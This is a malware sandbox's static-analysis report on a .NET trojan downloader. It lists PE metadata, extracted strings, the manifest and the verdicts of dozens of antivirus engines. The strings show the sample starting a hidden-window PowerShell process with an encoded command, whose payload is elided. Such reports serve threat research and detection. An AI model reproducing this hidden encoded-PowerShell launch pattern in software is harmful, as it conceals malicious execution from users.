Static | ZeroBOX

PE Compile Time

2023-01-19 18:24:51

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00000c14 0x00000e00 3.5545291401
.rsrc 0x00004000 0x00000578 0x00000600 4.24264838289
.reloc 0x00006000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000040a0 0x0000022c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000042d0 0x000002a2 LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, ASCII text

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
zufhegyujdkylrftklnmidcfiktkuxdp
mscorlib
System
Object
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
System.Diagnostics
ProcessStartInfo
set_FileName
set_Arguments
ProcessWindowStyle
set_WindowStyle
set_CreateNoWindow
Process
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8" ?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity version="8.2.6.8" name="wvhddqtcrlajhgxztahzpsblhpyjmhyvi" />
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
</asmv1:assembly>
powershell
-EncodedCommand "[...]"
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
LegalCopyright
OriginalFilename
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0

Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Clean
tehtris Clean
MicroWorld-eScan Gen:Variant.Marsilia.2083
FireEye Generic.mg.bea17f1ca9914a35
CAT-QuickHeal Clean
McAfee Artemis!BEA17F1CA991
Malwarebytes Trojan.Downloader.MSIL.Generic
Sangfor Clean
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Gen:Variant.Marsilia.2083
K7GW Clean
K7AntiVirus Trojan-Downloader ( 00593c201 )
Arcabit Trojan.Marsilia.D823
Baidu Clean
VirIT Trojan.Win32.Genus.NGS
Cyren W32/MSIL_Agent.DIE.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.MAE
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.MSIL.PsDownload.gen
Alibaba TrojanDownloader:MSIL/AsyncRat.c2217725
NANO-Antivirus Clean
ViRobot Clean
Rising Downloader.PsDownload!8.E547 (CLOUD)
Sophos Clean
F-Secure Trojan.TR/Dldr.Agent.fsbku
DrWeb Clean
VIPRE Gen:Variant.Marsilia.2083
TrendMicro TROJ_GEN.R002C0DAL23
Trapmine Clean
CMC Clean
Emsisoft Clean
SentinelOne Static AI - Malicious PE
Jiangmin Clean
Webroot W32.Trojan.MSIL.PsDownload
Avira TR/Dldr.Agent.fsbku
MAX malware (ai score=86)
Antiy-AVL Trojan[Downloader]/MSIL.PsDownload
Kingsoft Clean
Gridinsoft Trojan.Win32.Downloader.sa
Xcitium Malware@#3rcwp9f6u2b12
Microsoft Trojan:MSIL/AsyncRat.NEAG!MTB
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.MSIL.PsDownload.gen
GData Win32.Trojan-Downloader.Generic.KV7LEH
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5148890
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.36212.am0@ae9S0Dp
ALYac Gen:Variant.Marsilia.2083
TACHYON Clean
VBA32 Clean
Cylance Unsafe
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Msil.Trojan-Downloader.Ader.Mgil
Yandex Clean
Ikarus Trojan.MSIL.CoinMiner
MaxSecure Clean
Fortinet MSIL/Agent.MAE!tr
AVG Win32:Trojan-gen
Avast Win32:Trojan-gen

No IRMA results available.